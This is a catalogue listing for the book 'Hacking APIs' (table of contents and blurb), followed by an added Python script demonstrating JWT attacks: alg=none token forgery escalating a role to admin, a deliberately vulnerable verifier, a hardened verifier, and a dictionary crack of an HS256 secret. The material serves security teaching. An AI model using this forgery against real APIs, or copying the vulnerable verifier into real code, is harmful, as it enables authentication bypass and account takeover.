Hacking APIs: Breaking Web Application Programming Interfaces

Author: Corey J. Ball
Release date: 2022
Publisher: No Starch Press, Inc.
Page count: 363
File size: 13.2 MB
File type: PDF
Added by: codelibs

About the Author....8

About the Technical Reviewer....8

Foreword....19

Acknowledgments....23

Introduction....25

The Allure of Hacking Web APIs....26

This Book’s Approach....26

Hacking the API Restaurant....27

Part I: How Web API Security Works....29

0: Preparing for Your Security Tests....31

Receiving Authorization....32

Threat Modeling an API Test....32

Which API Features You Should Test....34

API Authenticated Testing....34

Web Application Firewalls....35

Mobile Application Testing....35

Auditing API Documentation....36

Rate Limit Testing....36

Restrictions and Exclusions....37

Security Testing Cloud APIs....38

DoS Testing....38

Reporting and Remediation Testing....39

A Note on Bug Bounty Scope....39

Summary....41

1: How Web Applications Work....43

Web App Basics....43

The URL....44

HTTP Requests....45

HTTP Responses....46

HTTP Status Codes....47

HTTP Methods....48

Stateful and Stateless HTTP....50

Web Server Databases....51

SQL....51

NoSQL....52

How APIs Fit into the Picture....53

Summary....54

2: The Anatomy of Web APIs....55

How Web APIs Work....56

Standard Web API Types....58

RESTful APIs....58

GraphQL....62

REST API Specifications....66

API Data Interchange Formats....67

JSON....67

XML....69

YAML....70

API Authentication....70

Basic Authentication....71

API Keys....72

JSON Web Tokens....73

HMAC....74

OAuth 2.0....75

No Authentication....76

APIs in Action: Exploring Twitter’s API....76

Summary....79

3: Common API Vulnerabilities....81

Information Disclosure....82

Broken Object Level Authorization....83

Broken User Authentication....84

Excessive Data Exposure....86

Lack of Resources and Rate Limiting....87

Broken Function Level Authorization....87

Mass Assignment....89

Security Misconfigurations....90

Injections....92

Improper Assets Management....93

Business Logic Vulnerabilities....94

Summary....95

Part II: Building an API Testing Lab....97

4: Your API Hacking System....99

Kali Linux....100

Analyzing Web Apps with DevTools....100

Capturing and Modifying Requests with Burp Suite....103

Setting Up FoxyProxy....104

Adding the Burp Suite Certificate....104

Navigating Burp Suite....105

Intercepting Traffic....107

Altering Requests with Intruder....109

Crafting API Requests in Postman, an API Browser....112

The Request Builder....114

Environments....117

Collections....118

The Collection Runner....121

Code Snippets....122

The Tests Panel....122

Configuring Postman to Work with Burp Suite....123

Supplemental Tools....124

Performing Reconnaissance with OWASP Amass....125

Discovering API Endpoints with Kiterunner....126

Scanning for Vulnerabilities with Nikto....127

Scanning for Vulnerabilities with OWASP ZAP....128

Fuzzing with Wfuzz....128

Discovering HTTP Parameters with Arjun....130

Summary....131

Lab #1: Enumerating the User Accounts in a REST API....131

5: Setting Up Vulnerable API Targets....137

Creating a Linux Host....138

Installing Docker and Docker Compose....138

Installing Vulnerable Applications....139

The completely ridiculous API (crAPI)....139

OWASP DevSlop’s Pixi....140

OWASP Juice Shop....140

Damn Vulnerable GraphQL Application....141

Adding Other Vulnerable Apps....142

Hacking APIs on TryHackMe and HackTheBox....143

Summary....144

Lab #2: Finding Your Vulnerable APIs....144

Part III: Attacking APIs....149

6: Discovery....151

Passive Recon....152

The Passive Recon Process....152

Google Hacking....153

ProgrammableWeb’s API Search Directory....155

Shodan....157

OWASP Amass....159

Exposed Information on GitHub....161

Active Recon....164

The Active Recon Process....164

Baseline Scanning with Nmap....166

Finding Hidden Paths in Robots.txt....167

Finding Sensitive Information with Chrome DevTools....167

Validating APIs with Burp Suite....170

Crawling URIs with OWASP ZAP....171

Brute-Forcing URIs with Gobuster....173

Discovering API Content with Kiterunner....174

Summary....176

Lab #3: Performing Active Recon for a Black Box Test....176

7: Endpoint Analysis....183

Finding Request Information....184

Finding Information in Documentation....184

Importing API Specifications....187

Reverse Engineering APIs....189

Adding API Authentication Requirements to Postman....192

Analyzing Functionality....194

Testing Intended Use....195

Performing Privileged Actions....196

Analyzing API Responses....197

Finding Information Disclosures....197

Finding Security Misconfigurations....198

Verbose Errors....198

Poor Transit Encryption....199

Problematic Configurations....199

Finding Excessive Data Exposures....200

Finding Business Logic Flaws....201

Summary....202

Lab #4: Building a crAPI Collection and Discovering Excessive Data Exposure....202

8: Attacking Authentication....207

Classic Authentication Attacks....208

Password Brute-Force Attacks....208

Password Reset and Multifactor Authentication Brute-Force Attacks....209

Password Spraying....211

Including Base64 Authentication in Brute-Force Attacks....213

Forging Tokens....215

Manual Load Analysis....215

Live Token Capture Analysis....217

Brute-Forcing Predictable Tokens....218

JSON Web Token Abuse....220

Recognizing and Analyzing JWTs....221

The None Attack....223

The Algorithm Switch Attack....223

The JWT Crack Attack....224

Summary....225

Lab #5: Cracking a crAPI JWT Signature....225

9: Fuzzing....229

Effective Fuzzing....230

Choosing Fuzzing Payloads....231

Detecting Anomalies....232

Fuzzing Wide and Deep....235

Fuzzing Wide with Postman....235

Fuzzing Deep with Burp Suite....238

Fuzzing Deep with Wfuzz....240

Fuzzing Wide for Improper Assets Management....242

Testing Request Methods with Wfuzz....244

Fuzzing “Deeper” to Bypass Input Sanitization....245

Fuzzing for Directory Traversal....246

Summary....246

Lab #6: Fuzzing for Improper Assets Management Vulnerabilities....247

10: Exploiting Authorization....251

Finding BOLAs....251

Locating Resource IDs....252

A-B Testing for BOLA....253

Side-Channel BOLA....254

Finding BFLAs....255

A-B-A Testing for BFLA....255

Testing for BFLA in Postman....256

Authorization Hacking Tips....258

Postman’s Collection Variables....258

Burp Suite Match and Replace....259

Summary....259

Lab #7: Finding Another User’s Vehicle Location....260

11: Mass Assignment....265

Finding Mass Assignment Targets....266

Account Registration....266

Unauthorized Access to Organizations....266

Finding Mass Assignment Variables....267

Finding Variables in Documentation....267

Fuzzing Unknown Variables....268

Blind Mass Assignment Attacks....269

Automating Mass Assignment Attacks with Arjun and Burp Suite Intruder....269

Combining BFLA and Mass Assignment....270

Summary....271

Lab #8: Changing the Price of Items in an Online Store....271

12: Injection....277

Discovering Injection Vulnerabilities....278

Cross-Site Scripting (XSS)....279

Cross-API Scripting (XAS)....280

SQL Injection....281

Manually Submitting Metacharacters....283

SQLmap....284

NoSQL Injection....285

Operating System Command Injection....287

Summary....289

Lab #9: Faking Coupons Using NoSQL Injection....289

Part IV: Real-World API Hacking....293

13: Applying Evasive Techniques and Rate Limit Testing....295

Evading API Security Controls....295

How Security Controls Work....296

API Security Control Detection....297

Using Burner Accounts....298

Evasive Techniques....298

Automating Evasion with Burp Suite....301

Automating Evasion with Wfuzz....302

Testing Rate Limits....304

A Note on Lax Rate Limits....304

Path Bypass....306

Origin Header Spoofing....307

Rotating IP Addresses in Burp Suite....308

Summary....312

14: Attacking GraphQL....313

GraphQL Requests and IDEs....314

Active Reconnaissance....315

Scanning....315

Viewing DVGA in a Browser....316

Using DevTools....317

Reverse Engineering the GraphQL API....318

Directory Brute-Forcing for the GraphQL Endpoint....318

Cookie Tampering to Enable the GraphiQL IDE....320

Reverse Engineering the GraphQL Requests....322

Reverse Engineering a GraphQL Collection Using Introspection....324

GraphQL API Analysis....325

Crafting Requests Using the GraphiQL Documentation Explorer....325

Using the InQL Burp Extension....326

Fuzzing for Command Injection....329

Summary....333

15: Data Breaches and Bug Bounties....335

The Breaches....336

Peloton....336

USPS Informed Visibility API....337

T-Mobile API Breach....339

The Bounties....340

The Price of Good API Keys....340

Private API Authorization Issues....341

Starbucks: The Breach That Never Was....343

An Instagram GraphQL BOLA....345

Summary....346

Conclusion....347

A: API Hacking Checklist....349

B: Additional Resources....351

Chapter 0: Preparing for Your Security Tests....351

Chapter 1: How Web Applications Work....351

Chapter 2: The Anatomy of Web APIs....352

Chapter 3: Common API Vulnerabilities....352

Chapter 4: Your API Hacking System....352

Chapter 5: Setting Up Vulnerable API Targets....352

Chapter 6: Discovery....353

Chapter 7: Endpoint Analysis....353

Chapter 8: Attacking Authentication....353

Chapter 9: Fuzzing....353

Chapter 10: Exploiting Authorization....353

Chapter 11: Mass Assignment....354

Chapter 12: Injection....354

Chapter 13: Applying Evasive Techniques and Rate Limit Testing....354

Chapter 14: Attacking GraphQL....354

Chapter 15: Data Breaches and Bug Bounties....354

Index....355

Hacking APIs is a crash course in web API security testing that will prepare you to penetration-test APIs, reap high rewards on bug bounty programs, and make your own APIs more secure.

You’ll learn how REST and GraphQL APIs work in the wild and set up a streamlined API testing lab with Burp Suite and Postman. Then you’ll master tools useful for reconnaissance, endpoint analysis, and fuzzing, such as Kiterunner and OWASP Amass. Next, you’ll learn to perform common attacks, like those targeting an API’s authentication mechanisms and the injection vulnerabilities commonly found in web applications. You’ll also learn techniques for bypassing protections against these attacks.

In the book’s nine guided labs, which target intentionally vulnerable APIs, you’ll practice:

  • Enumerating API users and endpoints using fuzzing techniques
  • Using Postman to discover an excessive data exposure vulnerability
  • Performing a JSON Web Token attack against an API authentication process
  • Combining multiple API attack techniques to perform a NoSQL injection
  • Attacking a GraphQL API to uncover a broken object level authorization vulnerability

By the end of the book, you’ll be prepared to uncover those high-payout API bugs other hackers aren’t finding and improve the security of applications on the web.
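The labs listed above include a JSON Web Token attack against an API authentication process, and Chapter 8 of the book covers the None attack, the algorithm switch attack and the JWT crack attack. The following Python script is an added example, not code from the book or from crAPI. It issues an HS256 token the way a correctly configured API would, forges an alg=none variant that escalates a claim, shows that a verifier which lets the token's own header choose the algorithm accepts the forgery while a verifier that pins the algorithm rejects it, and runs an offline dictionary attack against the signing secret. The secret, claims and wordlist are constructed for the demo; the RS256-to-HS256 algorithm switch variant is not implemented here, but the same algorithm pinning in the strict verifier defeats it.

```python
"""Added example (not from the book or crAPI): JWT forgery and cracking
with the standard library only. Secret, claims and wordlist are constructed."""
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional

SECRET = b"demo-secret-not-from-the-book"   # constructed signing key


def b64url(data: bytes) -> str:
    """Base64url without padding, as JWT requires (RFC 7515)."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_part(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(payload: dict, key: bytes) -> str:
    """Issue a token the way a correctly configured API would."""
    signing_input = f"{encode_part({'alg': 'HS256', 'typ': 'JWT'})}.{encode_part(payload)}"
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(sig)}"


def forge_none(token: str, new_claims: dict) -> str:
    """The None attack: set alg=none, edit claims, drop the signature."""
    header_b64, payload_b64, _sig = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    header["alg"] = "none"
    payload.update(new_claims)
    return f"{encode_part(header)}.{encode_part(payload)}."


def verify_naive(token: str, key: bytes) -> Optional[dict]:
    """Vulnerable verifier: lets the token's own header choose the algorithm."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    alg = str(header.get("alg", "")).lower()
    if alg == "none":                      # attacker-controlled branch
        return json.loads(b64url_decode(payload_b64))
    if alg == "hs256":
        expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return json.loads(b64url_decode(payload_b64))
    return None


def verify_strict(token: str, key: bytes) -> Optional[dict]:
    """Hardened verifier: the server pins the algorithm; the header is data, not policy."""
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:
        return None
    header_b64, payload_b64, sig_b64 = parts
    if json.loads(b64url_decode(header_b64)).get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


def crack_hs256(token: str, wordlist: Iterable[bytes]) -> Optional[bytes]:
    """The JWT crack attack: offline dictionary attack on a weak HS256 secret."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    target = b64url_decode(sig_b64)
    signing_input = f"{header_b64}.{payload_b64}".encode()
    for candidate in wordlist:
        if hmac.compare_digest(hmac.new(candidate, signing_input, hashlib.sha256).digest(), target):
            return candidate
    return None


def demo() -> dict:
    """Run the attacks against both verifiers; returns results for inspection."""
    token = sign_hs256({"sub": "user1", "role": "user"}, SECRET)
    forged = forge_none(token, {"role": "admin"})
    return {
        "naive_accepts_forgery": verify_naive(forged, SECRET),
        "strict_accepts_forgery": verify_strict(forged, SECRET),
        "strict_accepts_genuine": verify_strict(token, SECRET),
        "cracked_secret": crack_hs256(token, [b"password", b"secret", SECRET]),  # constructed wordlist
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The naive verifier lower-cases the alg value on purpose: real implementations that accept "None" or "nOnE" as well as "none" are the reason the book's fuzzing chapters vary case. The crack attack is only feasible against a short or dictionary-word secret; a random key of 256 bits or more makes the wordlist loop pointless, which is the remediation a report would recommend.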

